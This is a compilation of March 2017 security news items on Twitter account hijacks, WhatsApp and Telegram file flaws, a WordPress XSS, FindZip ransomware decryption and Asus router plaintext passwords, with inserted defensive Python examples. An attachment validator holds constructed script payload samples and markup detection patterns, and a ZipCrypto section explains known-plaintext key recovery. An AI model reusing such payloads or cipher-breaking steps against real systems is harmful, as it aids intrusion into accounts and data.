Personal data protection is about to get tougher; companies should prepare

15.3.2017 SecurityWorld Security
Leaks of data or internal information cause companies considerable damage, whether financial or to their reputation. In the near future the security of the personal data that companies process or store will play an even bigger role.

Particularly once the European Union's General Data Protection Regulation (GDPR) takes effect in May 2018. It introduces very high financial penalties for breaches of the rules that lead to data leaks, and in addition obliges organisations to report such incidents (under the regulation a breach must be notified to the supervisory authority within 72 hours of the organisation becoming aware of it, unless it is unlikely to pose a risk to the people affected). Is that realistic in practice? And who is responsible for data security?

Most people, IT professionals included, believe that the company's chief executive should be held responsible for a serious data protection breach. That is highly debatable, because top management often never learns of a breach at all, and a large share of breaches and attempted breaches is never detected.

In a recent Accenture survey, more than half of the security professionals polled (51%) admitted that it takes months to detect sophisticated intrusions, and that security teams miss a full third of successful breaches altogether.

"Responsibility for personal data lies with the company that processes or stores it. But a specific leak is always the responsibility of a specific person. Anyone who harms someone by their actions, whether deliberately or negligently, always could and can be held accountable and liable for damages," says Dagmar Mikulová, chief financial officer of the Gopas computer school. "If an organisation suffers a loss, it will try to find the culprit. Proving a specific act, however, is usually very difficult in practice."

How do companies most often lose data? Three main leak paths predominate. The first is inadequate protection against unauthorised access by an attacker from the internet.

"Here you can protect yourself with technical means: use firewalls and anti-malware, keep software and hardware updated, and configure everything correctly," says Mikulová.

The second is the so-called inside job: theft of data by an authorised user from inside the company.

"There is no effective defence against data theft by an employee who is authorised to work with the data because their job requires it," says Dagmar Mikulová. "The marketing claims of the vendors of so-called DLP (data leakage prevention) systems should be taken with a pinch of salt. The only sensible protection is to divide up employees' duties and not give everyone access to all the data," Mikulová adds.

The third is again an inside job, but by someone other than the directly authorised employee, when that employee makes mistakes or fails to follow correct procedures.

"The only defence against employee errors is education: maintaining security awareness and holding regular security training, on both the technology and the methodology," Dagmar Mikulová concludes.


Anything you share can and will be used against you

15.3.2017 SecurityWorld BigBrother
Yes, the CIA can hack into your television. But the real damage is more likely to come from your activity on Facebook.

The few-days-old WikiLeaks vs. CIA affair caused a stir and raised the question of whether the intelligence agency might be watching us too. As usual in such cases, the panic is somewhat overblown, fed by sensation-hungry media. Above all, the affair reminded us of what we all know: any device with a camera, a microphone or an IP address can be hacked. The question is whether the CIA will be watching us as well. The chance of that is close to zero, and even if it happened, it would most likely have no effect on our lives.

That is not to say there is no need for caution. Yes, use encrypted communication, do not click links in dubious e-mails, and feel free to tape over your laptop camera like Mark Zuckerberg. But your countermeasures should match what is actually likely to happen rather than what is theoretically possible. So yes, try to keep people out of your computer, but pay far more attention to, say, what you write on social networks. That is where you expose yourself to real risk.

Are you sharing unwanted posts?

Last year the US government began asking selected visa applicants for their social media accounts in order to check for possible links to terrorist organisations. For the past few weeks, customs and border officers have been doing this directly on entry to the country. They are interested not only in public posts but in private ones too, and the measure is expected to be extended in future from social networks to the internet as a whole. The government already has a proposal on the table to vet not only citizens of Muslim countries this way but Chinese citizens as well. In short, it wants to decide who is trustworthy based on their internet activity, and this trend is likely to catch on in other countries too.

It is not just about travel. Up to half of universities check the social media activity of applicants, and some insurers search Facebook for signs that prospective clients lead a lifestyle too risky to be affordable for them. Among employers, the share that screen prospective employees on social networks is approaching 60%, and more than 40% of managers regularly check existing employees this way; in a survey, one in four of them admitted having found something on a social network that led them to reprimand or outright fire an employee. And that is nothing compared to what most likely still awaits us.

Social networks say more about you than you think

Your social media posts really are a window into your soul. For example: a few days ago Facebook launched an AI tool that analyses whether users show suicidal tendencies, while the site www.wefeel.csiro.au detects the collective mood of society from Twitter posts. There is no doubt that analysing social networks and selling the results will become big business.

The Chinese government has even launched a pilot of its Social Credit System, whose aim is to "grade" every citizen on the basis of exactly such analyses, combined with criminal records and financial activity. The resulting score is meant to determine people's rights, privileges and opportunities across many areas of life. And although the project is still in its infancy, the government has already used it to bar almost seven million people who allegedly fail to pay their debts on time from flying or travelling on high-speed trains. The weight given to social media is alarming. Want a better score? Praise the government on social networks. Speak up for Tibet? Down goes your overall score...

The Western way of controlling the population through social media is built more on freedom, but it can still make your life quite complicated. Applications are already being developed that can pull all the data and posts from your accounts and "pigeonhole" you, and the accuracy of that characterisation will grow as artificial intelligence develops. In the near future, your activity on social networks (and on the internet in general) will produce a file that may weigh on your application for a visa, a loan, a job and so on. And the worst part? You need not even know about it.

So yes, the CIA can hack into your smart TV, but it probably will not. Social media is a far bigger threat, because anything you share there can and will be used against you.


Massive hacking attack on Twitter accounts, the trail leads to Turkey

15.3.2017 Novinky/Bezpečnost BigBrother
Hackers have targeted Twitter. They managed to compromise hundreds of verified accounts on the microblogging network, among them the accounts of the European Parliament, Amnesty International, UNICEF, media companies and well-known personalities, CNBC reported on its website on Wednesday.
The attackers made themselves known on the hijacked accounts immediately. They published posts, written in Turkish, that among other things call the Netherlands and Germany Nazis over their behaviour towards Turkey. Some users also had their profile picture changed to the Turkish flag and the coat of arms of the Ottoman Empire.

One of the messages, or tweets, also featured a swastika, the symbol of Nazi Germany. Hashtags translating as Nazi Germany and Nazi Netherlands appeared as well, along with a tweet supporting Turkish president Recep Tayyip Erdoğan. The tweet also links to a video of Erdoğan and mentions 16 April, the date of the referendum that is meant to strengthen the president's powers.

Who is behind the attack is not yet clear. No hacking group has officially claimed responsibility so far.


Alex Hern ✔ @alexhern
Looks like the mass hack that's hit a bunch of twitter accounts stems from http://twittercounter.com
8:29 AM - 15 Mar 2017
This is what the hackers' messages, sent through the hijacked accounts, looked like.
The compromised profiles include those of Forbes magazine, the bitcoin wallet Blockchain, the German football club Borussia Dortmund, Justin Bieber's Japanese account and the UK Department of Health.

A Twitter Counter spokesperson told CNBC that the company is aware of the situation and is investigating it.

Twitter itself is not at fault
According to a number of foreign sites, including The Verge and Krebs on Security, the microblogging network could not have prevented the attack. It was not Twitter itself that was breached but a third-party analytics application called Twitter Counter. Users had granted the app permission to post on their behalf, and that is what let the hackers take over the accounts linked to the service.

Tension between Turkey and the Netherlands has been running high for some time. Last week Erdoğan called the Dutch government Nazi and fascist. Over the weekend the Netherlands declared the Turkish minister for family affairs an undesirable person and escorted her to Germany.

The minister had intended to address members of the local Turkish community in Rotterdam and persuade them to vote in the April referendum on changes to the Turkish constitution in favour of strengthening the head of state's powers. Erdoğan warned that the Netherlands would pay for its actions. Turkey is in a similar dispute with Germany.


WhatsApp had a hole that gave easy access to photos and private chats
15.3.2017 Živě.cz Vulnerabilities

The web version of the popular WhatsApp messenger contained a vulnerability that allowed attackers to take over a victim's account, download all their photos or read their complete conversation history. Users of the Telegram messenger could be attacked in a similar way. Security analysts at Check Point reported the findings.

Attackers could exploit the flaw against any user of the web interface. They packed malicious code into a file that posed as an ordinary photo; when the victim clicked it, the code used the browser's locally stored data (the web client's session data) to take over the account. The attack abused two mechanisms of the messenger. The first is the preview shown in the conversation for known file types such as documents, photos and web pages: an HTML file can contain arbitrary code, yet WhatsApp showed only an image in the preview, because the preview trusted the file type the sender declared rather than the actual content.


The second problem was that messages are encrypted before sending, which prevented WhatsApp from checking the transmitted files on the server side. This was quickly fixed: the applications now validate files on the client before they are encrypted and sent.
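The client-side validation the fix describes, as an added example (mine, not WhatsApp's or Telegram's code; the page does not say which checks they introduced): the declared MIME type is compared with the file's leading bytes, and content that carries HTML or script markup is rejected regardless of what it claims to be, which also catches image/script polyglots. The sample files are constructed.

```python
"""Attachment validation for a web messenger: verify that a file's bytes match
the type the sender declared before it is encrypted, sent or previewed.

Added example (not WhatsApp's or Telegram's code). It accepts a small set of
raster image types by magic bytes and rejects anything a browser would
interpret as HTML or script, including image/script polyglots.
"""

IMAGE_SIGNATURES = {
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
# image/svg+xml is deliberately absent: SVG is an image type that can carry <script>.

ACTIVE_MARKERS = (b"<script", b"<html", b"<!doctype html", b"<svg",
                  b"<iframe", b"javascript:", b"onload=", b"onerror=")


def sniff_image_type(data: bytes):
    """Return the image MIME type implied by the leading bytes, or None."""
    for mime, sigs in IMAGE_SIGNATURES.items():
        if data.startswith(sigs):
            return mime
    return None


def looks_active(data: bytes) -> bool:
    """Scan the first 4 KiB (enough for a header-first polyglot) for markup."""
    head = data[:4096].lower()
    return any(marker in head for marker in ACTIVE_MARKERS)


def validate_attachment(declared_mime: str, data: bytes):
    """Return (accepted, reason). Run on the sending client before encryption
    and again on the receiving client before rendering a preview."""
    if looks_active(data):
        return False, "content contains HTML or script markup"
    sniffed = sniff_image_type(data)
    if not declared_mime.startswith("image/"):
        return False, f"type {declared_mime} is not previewable here"
    if sniffed is None:
        return False, "declared as an image but no known image signature"
    if sniffed != declared_mime:
        return False, f"declared {declared_mime} but content is {sniffed}"
    return True, sniffed


# Constructed samples for the demonstration.
PNG_SAMPLE = (b"\x89PNG\r\n\x1a\n"                  # PNG signature
              b"\x00\x00\x00\rIHDR"                 # IHDR chunk length and type
              b"\x00\x00\x00\x01\x00\x00\x00\x01"   # 1x1 pixel
              b"\x08\x02\x00\x00\x00\x90wS\xde")
HTML_SAMPLE = b"<html><body><script>fetch('/local-session')</script></body></html>"
POLYGLOT_SAMPLE = b"GIF89a" + b"\x00" * 20 + b"<script>alert(1)</script>"
```

Checking only the declared type is exactly what the attack defeated. Two further mitigations the example does not show: serve user-uploaded content from a separate origin, so that a file that does get rendered cannot read the messenger's session storage, and deliver downloads with a Content-Disposition: attachment header so the browser saves rather than renders them.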

In Telegram's case the exploitation was very similar; Check Point's analysts demonstrated it by sending a "funny" video. If the victim clicked it, they were again redirected to a file that could use locally stored data to take over the account.


Both WhatsApp and Telegram have patched the holes, so users should no longer be at risk from this type of attack.


Hackers Abuse Twitter App to Hijack High-Profile Accounts

15.3.2017 securityweek Hacking
Many high-profile Twitter accounts have been hijacked in an attack apparently motivated by the recent diplomatic dispute between Turkey and the Netherlands.

Hacktivists posted messages in Turkish containing the hashtags #Nazialmanya (Nazi Germany) and #Nazihollanda (Nazi Netherlands) on many Twitter accounts, including ones belonging to high-profile organizations such as Amnesty International, the European Parliament, Duke University, UNICEF USA, Forbes, Reuters Japan, and BBC North America.

The message was also posted from the Twitter accounts of hundreds of apparently random individuals.

A majority of the affected organizations have already restored their accounts, and some of them have notified their followers about the hack.

The tweets included a link to a YouTube video showing Turkish president Recep Tayyip Erdoğan. The compromised Twitter accounts also had their profile pictures replaced with an image of the Ottoman Empire’s coat of arms.


The attack was launched just as Turkey is preparing for a referendum, scheduled for April 16, on boosting the president’s powers. The Netherlands’ recent decision to prevent Turkish ministries from addressing expatriate Turks on the matter has caused tensions between the two countries.

It appears that hackers managed to hijack a large number of Twitter accounts through Twitter Counter, a stats and marketing analytics app that reportedly has more than 2 million users and tracks over 350 million Twitter accounts. The Netherlands-based service has pointed out that it does not store any Twitter credentials or payment card information.

TheCounter @thecounter
We're aware that our service was hacked and have started an investigation into the matter. We've already taken measures to contain such abuse
9:55 AM - 15 Mar 2017

TheCounter @thecounter
Assuming this abuse is indeed done using our system, we've blocked all ability to post tweets and changed our Twitter app key.
10:18 AM - 15 Mar 2017

The application requests both read and write access to users' Twitter accounts, which is what allowed the hackers to send tweets through the service. Some of the victims said they revoked the app's access to their accounts following the incident.
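How a compromised analytics app turns into tweets from hundreds of accounts, and why changing the app key stops it, as an added example (mine, not Twitter Counter's or Twitter's code): a minimal implementation of OAuth 1.0a request signing, the scheme Twitter's v1.1 API uses for third-party apps. Every request an app makes on a user's behalf is signed with HMAC-SHA1 over the request parameters, keyed by the app's consumer secret and the user's access-token secret, so whoever holds the app's credentials and its stored user tokens can sign valid tweets. The credentials, tweet text, nonce and timestamp below are constructed.

```python
"""OAuth 1.0a request signing as used by the Twitter API v1.1 for third-party apps.

Added example, not Twitter Counter's or Twitter's code. A request made on a
user's behalf is signed with HMAC-SHA1 over the request parameters, keyed by
the app's consumer secret and the user's token secret. Whoever holds the app's
credentials and its stored user tokens can sign valid tweets; rotating the
consumer secret or revoking the token invalidates them.
"""
import base64
import hashlib
import hmac
from urllib.parse import quote


def _enc(value) -> str:
    """RFC 3986 percent-encoding; only unreserved characters stay bare."""
    return quote(str(value), safe="")


def signature_base_string(method: str, url: str, params: dict) -> str:
    """METHOD&enc(url)&enc(sorted k=v pairs). oauth_signature itself is never included."""
    pairs = sorted((_enc(k), _enc(v)) for k, v in params.items())
    param_string = "&".join(f"{k}={v}" for k, v in pairs)
    return "&".join([method.upper(), _enc(url), _enc(param_string)])


def sign_request(method, url, params, consumer_secret, token_secret) -> str:
    """Client side: signing key is enc(consumer_secret)&enc(token_secret)."""
    key = f"{_enc(consumer_secret)}&{_enc(token_secret)}".encode()
    msg = signature_base_string(method, url, params).encode()
    return base64.b64encode(hmac.new(key, msg, hashlib.sha1).digest()).decode()


def verify_request(method, url, params, signature, consumer_secrets, token_secrets) -> bool:
    """Server side: look up both secrets by the identifiers the request carries."""
    try:
        c_secret = consumer_secrets[params["oauth_consumer_key"]]
        t_secret = token_secrets[params["oauth_token"]]
    except KeyError:
        return False                      # unknown app key or revoked token
    expected = sign_request(method, url, params, c_secret, t_secret)
    return hmac.compare_digest(expected, signature)


# Constructed credentials for the demonstration; none of these are real keys.
URL = "https://api.twitter.com/1.1/statuses/update.json"
APP_KEY = "app-key-EXAMPLE"
APP_SECRET_OLD = "app-secret-v1-EXAMPLE"
APP_SECRET_NEW = "app-secret-v2-EXAMPLE"     # after the app rotates its key
USER_TOKEN = "user-token-EXAMPLE"
USER_TOKEN_SECRET = "user-token-secret-EXAMPLE"


def build_params(status: str, nonce="nonce-EXAMPLE", timestamp="1489566540") -> dict:
    return {
        "status": status,
        "oauth_consumer_key": APP_KEY,
        "oauth_nonce": nonce,
        "oauth_signature_method": "HMAC-SHA1",
        "oauth_timestamp": timestamp,
        "oauth_token": USER_TOKEN,
        "oauth_version": "1.0",
    }


def demo() -> dict:
    params = build_params("Posted through the analytics app")
    sig = sign_request("POST", URL, params, APP_SECRET_OLD, USER_TOKEN_SECRET)
    tokens = {USER_TOKEN: USER_TOKEN_SECRET}
    return {
        "accepted": verify_request("POST", URL, params, sig, {APP_KEY: APP_SECRET_OLD}, tokens),
        # The app changes its consumer secret: every signature made with the old one fails.
        "after_key_rotation": verify_request("POST", URL, params, sig, {APP_KEY: APP_SECRET_NEW}, tokens),
        # The user revokes the app: its token is gone from the server's table.
        "after_token_revocation": verify_request("POST", URL, params, sig, {APP_KEY: APP_SECRET_OLD}, {}),
        # Any change to a signed parameter, here the tweet text, also fails.
        "tampered_text": verify_request("POST", URL, dict(params, status="changed"), sig,
                                        {APP_KEY: APP_SECRET_OLD}, tokens),
    }
```

The three failing cases in demo() are the containment options the incident shows: the app rotating its consumer secret invalidates everything signed with the old one at once, while a user revoking the app removes only that user's token. The example also shows why the write scope matters: a token granted read-only access could not have posted, so an app should be granted the narrowest scope it actually needs.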

This is not the first time Twitter Counter has been abused by hackers. In November, the company suffered a security breach that led to spam tweets being posted from high-profile Twitter accounts, including ones belonging to PlayStation, Xbox, The New Yorker, Charlie Sheen, Lionel Messi, and Minnesota Governor Mark Dayton.


WordPress Content Injection Flaw Makes XSS Bug More Severe

15.3.2017 securityweek Vulnerability

Sucuri has shared details about one of the cross-site scripting (XSS) vulnerabilities patched last week in WordPress. The flaw can be highly useful to attackers if combined with a content injection bug that has been exploited in the wild.

WordPress 4.7.3, released on March 6, patches six vulnerabilities, including three XSS issues. One of them, a stored XSS tracked as CVE-2017-6817, was identified and reported by Sucuri researcher Marc Montpas.

The flaw allows an authenticated attacker to inject arbitrary JavaScript code into posts; it can be triggered through the YouTube URLs and shortcodes WordPress turns into embeds. An attacker with contributor privileges can leverage the flaw to create a backdoor on the targeted website.
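A hardened counterpart to this class of bug, as an added example (mine, not WordPress's code; the page does not give the vulnerable embed code and this does not reproduce it): a YouTube URL supplied by a contributor is reduced to a validated video ID, and the embed markup is generated from that ID alone, so nothing the contributor typed reaches the HTML. The accepted hosts and the ID format are YouTube's; the sample URLs are constructed.

```python
"""Safe embedding of a user-supplied video URL.

Added example, not WordPress code: the submitted URL is never echoed into
markup. It is parsed, restricted to the expected hosts, reduced to a video ID
matching a strict pattern, and the embed is rebuilt from that ID alone.
"""
import re
from html import escape
from urllib.parse import parse_qs, urlsplit

VIDEO_ID = re.compile(r"[A-Za-z0-9_-]{11}")   # the only shape a YouTube video ID takes
YOUTUBE_HOSTS = {"youtube.com", "www.youtube.com", "m.youtube.com", "youtu.be"}


def extract_video_id(url: str):
    """Return the 11-character video ID, or None if the URL is not acceptable."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or parts.hostname not in YOUTUBE_HOSTS:
        return None
    if parts.hostname == "youtu.be":
        candidate = parts.path.lstrip("/").split("/")[0]
    elif parts.path == "/watch":
        candidate = parse_qs(parts.query).get("v", [""])[0]
    elif parts.path.startswith("/embed/"):
        candidate = parts.path[len("/embed/"):].split("/")[0]
    else:
        return None
    return candidate if VIDEO_ID.fullmatch(candidate) else None


def youtube_embed_html(url: str):
    """Build the iframe from the validated ID; None means 'do not embed'."""
    video_id = extract_video_id(url)
    if video_id is None:
        return None
    # The ID is already limited to [A-Za-z0-9_-]; escape() is defence in depth.
    src = "https://www.youtube.com/embed/" + escape(video_id, quote=True)
    return f'<iframe src="{src}" width="560" height="315" allowfullscreen></iframe>'
```

The point is the direction of data flow: the output is built from a value that can only be eleven characters from a fixed alphabet, so an attacker who controls the URL (or, after the content injection bug, the whole post) still cannot place a quote, a tag or an event handler into the embed.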

Since exploitation requires at least contributor privileges, the vulnerability is considered low severity on its own. The risk is higher, however, on WordPress versions prior to 4.7.2, which addressed a critical content injection and privilege escalation flaw.

The content injection vulnerability, also discovered by researchers at Sucuri, has been exploited in the wild for remote code execution and to deface a large number of web pages. Combining the content injection flaw with the stored XSS allows a remote attacker to inject malicious JavaScript code into posts on a WordPress site.

“Combined with the recent content injection vulnerability we found, it’s possible for a remote attacker to deface a random post on the site and store malicious JavaScript code in it,” explained Montpas. “This code would be executed when visitors view the post and when anyone edits the post from the WordPress dashboard. As a result, when an administrator tries to fix the defaced post, they would unknowingly trigger the malicious script, which could then be used to put a backdoor on the site and create new admin users.”

The stored XSS has been around for some time, even before version 4.7, while the content injection flaw affects versions 4.7 and 4.7.1. Version 4.7.x is running on roughly half of WordPress websites, and judging by the large number of sites affected by the content injection attacks, many of them are not updated automatically.


Mac users, enjoy: a free FindZip macOS ransomware decryption tool is available online
15.3.2017 securityaffairs Virus

Good news for macOS users infected by the FindZip ransomware: Avast has released a free decryption tool.
The FindZip macOS ransomware was spotted last month by researchers at ESET, who track it as OSX/Filecoder.E.

The ransomware, written in Swift, was distributed through BitTorrent sites and calls itself “Patcher”, ostensibly an application for pirating popular software.

The first release was broken: victims could not recover their files even if they paid the ransom.

For this reason, security experts were inviting victims of the ransomware to avoid paying the ransom.

Due to coding errors, the malware destroyed the randomly generated encryption key without ever sending it to the attackers' command and control server.

The name FindZip comes from an update to Apple’s XProtect signatures, which began detecting the malware under that name soon after it appeared. The threat masquerades as cracks for Adobe Premiere Pro and Microsoft Office, and the samples are code-signed.
Few ransomware families target macOS; FindZip is only the second strain built for the platform.

The good news is that victims of the FindZip macOS ransomware can now recover their files for free, thanks to researchers at the security firms Malwarebytes and Avast.

A couple of weeks ago, Malwarebytes Labs published instructions for restoring data encrypted by the FindZip macOS ransomware.

The procedure is a known-plaintext attack on the ZIP encryption FindZip uses (pkcrack implements it), which is why an unencrypted copy of one file and its encrypted counterpart are required. It needs the following:

Xcode or TextWrangler
Xcode command-line tools
pkcrack source code
One unencrypted file and the corresponding encrypted file
The process also requires a second account on the infected Mac.
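Why one unencrypted file is enough to unlock the rest, as an added example (mine, not Malwarebytes' or Avast's code): an implementation of PKZIP's traditional "ZipCrypto" stream cipher, the scheme FindZip's archives use and the one pkcrack attacks. Encryption and decryption depend only on three 32-bit state words derived from the password, never on the password itself, so recovering that state from one known plaintext/ciphertext pair decrypts every entry protected with the same password. The Biham-Kocher state recovery that pkcrack performs is not reimplemented here; the example derives the state from the password as a stand-in for what pkcrack would output. The password, header bytes and file contents are constructed.

```python
"""PKZIP traditional ("ZipCrypto") stream cipher and a known-plaintext view of it.

Added example: the cipher that protects entries in a password-protected ZIP
and that pkcrack attacks. The keystream depends on three 32-bit words
derived from the password; anyone holding those words can decrypt any entry
made with the same password without ever learning the password.
"""

# Standard reflected CRC-32 table (polynomial 0xEDB88320), as zip uses.
_CRC_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


def _crc32_byte(crc: int, b: int) -> int:
    return (crc >> 8) ^ _CRC_TABLE[(crc ^ b) & 0xFF]


class ZipCrypto:
    """State machine from APPNOTE.TXT, 'Traditional PKWARE Encryption'."""

    def __init__(self, keys):
        self.key0, self.key1, self.key2 = keys

    @classmethod
    def from_password(cls, password: bytes):
        state = cls((0x12345678, 0x23456789, 0x34567890))
        for b in password:
            state._update(b)
        return state

    def keys(self):
        return (self.key0, self.key1, self.key2)

    def _update(self, b: int):
        # Each processed plaintext byte mixes into all three words.
        self.key0 = _crc32_byte(self.key0, b)
        self.key1 = (self.key1 + (self.key0 & 0xFF)) & 0xFFFFFFFF
        self.key1 = (self.key1 * 134775813 + 1) & 0xFFFFFFFF
        self.key2 = _crc32_byte(self.key2, self.key1 >> 24)

    def _keystream_byte(self) -> int:
        t = (self.key2 & 0xFFFF) | 2
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update(p)            # the state advances on the PLAINTEXT byte
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


HEADER_LEN = 12   # zip prepends 12 (mostly random) bytes to every encrypted entry


def encrypt_entry(password: bytes, header: bytes, plaintext: bytes) -> bytes:
    """One zip entry: the 12-byte header and the file data form one stream."""
    return ZipCrypto.from_password(password).encrypt(header + plaintext)


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """What a known plaintext gives you directly. Because the state is updated
    with plaintext bytes, this keystream is valid only for this file; pkcrack
    uses it to recover the three state words, which are valid for all files."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def decrypt_entry_with_state(keys, ciphertext: bytes) -> bytes:
    """Decrypt with recovered (key0, key1, key2); no password needed."""
    return ZipCrypto(keys).decrypt(ciphertext)[HEADER_LEN:]


# Constructed sample data for the demonstration.
PASSWORD = b"not-the-real-findzip-key"
HEADER = bytes(range(HEADER_LEN))                        # normally random per entry
KNOWN = b"This document is also on my backup drive.\n"    # the file you still have in clear
OTHER = b"Second file; only the encrypted copy survives.\n"


def demo() -> bool:
    ct_other = encrypt_entry(PASSWORD, HEADER, OTHER)
    # Stand-in for pkcrack's Biham-Kocher step: the post-password state words.
    recovered = ZipCrypto.from_password(PASSWORD).keys()
    return decrypt_entry_with_state(recovered, ct_other) == OTHER
```

The subtlety worth noticing is in recover_keystream(): because every plaintext byte feeds back into the state, XORing a known file with its ciphertext yields a keystream that is correct only for that file. That is why the attack has to recover the internal state words rather than reuse the keystream, and why, once it has them, the password itself is irrelevant.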

The process was later automated by Avast, who developed the FindZip decryption tool. Victims can decrypt their files on either a Mac or a Windows machine.

“Malwarebytes already published a technical analysis of FindZip, as well as a description of the decryption process. However, because the instructions described by Malwarebytes may be complicated for some, we created a more user friendly decryption application.” reads a blog post published by Avast.

“The FindZip decryption tool is available on our free ransomware decryption tools page, along with all of our ransomware decryption tools.”

The tool was successfully tested on macOS 10.10 (Yosemite) and macOS 10.12 (Sierra).

Victims who copy the encrypted files from the infected Mac to a Windows system can run the Avast decryptor directly; no other software is required.

On Mac or Linux, the tool needs a Windows compatibility layer; it works with CrossOver and Wine, and Avast says other such programs might work as well.

To run Wine on a Mac, victims also need a windowing system such as XQuartz.

“Important note: If you already had Wine installed prior to being infected with the ransomware, the entire Wine configuration is probably encrypted. In that case, you need to delete the folder \Users\<YourUserName>\.wine before running the decryptor application.” continues the post.

Enjoy the tool!


Asus RT-N10R routers store the password in plaintext
15.3.2017 Root.cz Security

A previously unpublished vulnerability was discovered purely by chance on the Asus RT-N10R router. Although it is no catastrophe, it is a particular kind of vulnerability. Along the way you will also learn why even this small flaw is a problem and why it can be called a vulnerability. As a bonus, you will read how and under what circumstances it was discovered.

Description of the vulnerability
I found that when the Asus RT-N10R router creates a backup, it writes the password into it as is, in plaintext, unhashed. Along with it, it stores the user name, model and manufacturer, again in plaintext. The backup file is therefore a weak point. A backup in this form fairly conclusively shows that the router stores the password in exactly the same way in its non-volatile memory.

Why can we be sure? With a properly implemented hash function and a sufficiently good salt it is not possible to recover the original password, so the router could not have hashed it and then written the plaintext into the backup. No even slightly sane programmer would do that anyway, because it is far simpler to store something than to write a "de-hashing" algorithm, which would moreover be a weakness of the router.

Demonstrating the vulnerability
The demonstration naturally requires the router in question and ideally a hex editor/viewer. Then you simply change the password to a known one and save a backup file, which you then open in the editor. Since I assume you do not have this router, I am providing a screenshot of what the hex editor shows. For now I will let you find the password in the picture yourself.

The backed-up password was: Azsemsmispritale

I assume you spotted the password in the picture yourselves. The backup also reveals the model and manufacturer, and in another part of the file, which I am not publishing (I do not know what else sensitive could be "read" from the backup), you can find, for example, the NTP server in use.

Why this is a problem
You may be thinking: "But it is a backup file. As long as it does not slip out somewhere, I am safe." The problem is precisely that "as long as", which can never be guaranteed completely. We also do not know how the firmware is written. Since the router most likely holds your password in some cell of its flash memory, there is simply no guarantee that it cannot get out of that cell.

Recall the rom-0 security flaw, which allowed exactly this backup file to be downloaded from routers remotely. If the password is stored in it in the clear, an attacker can log in to the network immediately and take control of the router.

There are two ways the password can get out:

through a software flaw
through hardware
Through a software flaw
Such flaws can mean that under the right conditions (for example by requesting the right address) we can learn the router's password. This kind of vulnerability existed and was patched in the previous firmware update. Some routers, for instance, expose a remotely accessible terminal with privileged access, and hence access to the entire flash memory. Finally, we do not know how the router copes with extreme load, for example during a DoS attack.

Through hardware
Most of you know there are ways to read from and write to memory directly, using ICSP, JTAG and the like. There are also dedicated flash memory readers.

Put simply, even the BIOS in your computer had to be loaded there by someone with something, and the same goes for any modern electronics. Whatever can be written should also be readable.

How it should be done, and why
How to do it right
Ideally, no device that authenticates a user with a user name and password should know the password itself. That is how decent services and decent devices do it. The way they verify you is as follows.

The algorithm that stores and verifies the password has two basic components:

a random string generator (the string is called a salt)
a hash algorithm
When the password is first set, the algorithm takes your password and generates a salt. It then "salts" your password thoroughly. It is important that the salt never repeats and is long enough. Ideally it then overwrites or erases the memory block where the password was held in readable form. Finally the salted password goes into the hash algorithm, which returns a hash.

This hash, together with the salt and your user name, is stored in a table. It is important here that the hash algorithm is strong enough and that the slightest change in the password produces a completely different hash. In practice this means a deliberately slow password-hashing function such as PBKDF2, bcrypt, scrypt or Argon2 rather than a single round of a general-purpose hash like MD5 or SHA-1, so that guessing passwords against a stolen table stays expensive.

On every subsequent login the same procedure is followed, except that the salt is not generated again: it is looked up in the table by user name and combined with your password in the same way. The resulting hash of the entered, salted password is then compared with the stored one. If they match, you are logged in; otherwise you are refused.

Why do it in such a complicated way
Simply put: the device or service never knows the password at all. All that is stored is the hash and the salt, so recovering the original passwords is extremely hard.

Another advantage is that even if all users had the same password, each would have a different hash in the table. You therefore cannot tell from identical hashes that two users share a password, and cracking one hash does not give you the others: to learn all the passwords you must break every hash, not just one.
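The scheme just described, as an added example in Python (mine, not the router's firmware): salted, iterated hashing with PBKDF2-HMAC-SHA256, a constant-time comparison, and the form such a record could take in a backup file instead of the plaintext password. The demonstration uses the test password from this article; everything else is constructed.

```python
"""Password storage without the password: per-user random salt, a slow
key-derivation function, constant-time comparison.

Added example, not the router's firmware. Compared with a single salted
hash, PBKDF2 repeats the hash many thousands of times so that whoever
obtains the backup or dumps the flash cannot test guesses quickly.
"""
import base64
import hashlib
import hmac
import os

ITERATIONS = 200_000   # tune so one verification takes on the order of 100 ms on the device
SALT_LEN = 16          # 128-bit random salt, unique per user


def create_record(username: str, password: str, iterations: int = ITERATIONS) -> dict:
    """Return everything that needs storing; the password is not part of it."""
    salt = os.urandom(SALT_LEN)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {
        "user": username,
        "iterations": iterations,
        "salt": base64.b64encode(salt).decode(),
        "hash": base64.b64encode(digest).decode(),
    }


def verify(record: dict, password: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt = base64.b64decode(record["salt"])
    expected = base64.b64decode(record["hash"])
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, record["iterations"])
    return hmac.compare_digest(digest, expected)


def backup_line(record: dict) -> str:
    """What a configuration backup should carry for an account: a verifier, not a secret."""
    return "{user}:pbkdf2_sha256${iterations}${salt}${hash}".format(**record)


def demo() -> dict:
    # Two accounts with the same password (the one from the article) get
    # different salts and therefore different hashes.
    admin = create_record("admin", "Azsemsmispritale")
    guest = create_record("guest", "Azsemsmispritale")
    return {
        "admin_ok": verify(admin, "Azsemsmispritale"),
        "case_changed_rejected": not verify(admin, "azsemsmispritale"),
        "hashes_differ": admin["hash"] != guest["hash"],
        "plaintext_absent": "Azsemsmispritale" not in backup_line(admin),
    }
```

Argon2, scrypt or bcrypt serve the same purpose and are preferable where available; PBKDF2 is used here because it ships with Python's standard library. On a low-end router the iteration count has to be tuned to the CPU, but even a modest count is a large improvement over storing the password itself, and a backup containing only backup_line() records reveals nothing an attacker can log in with directly.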

For the curious: a YouTube video taught me a lot in this area, so have a look at it.

Asus's response
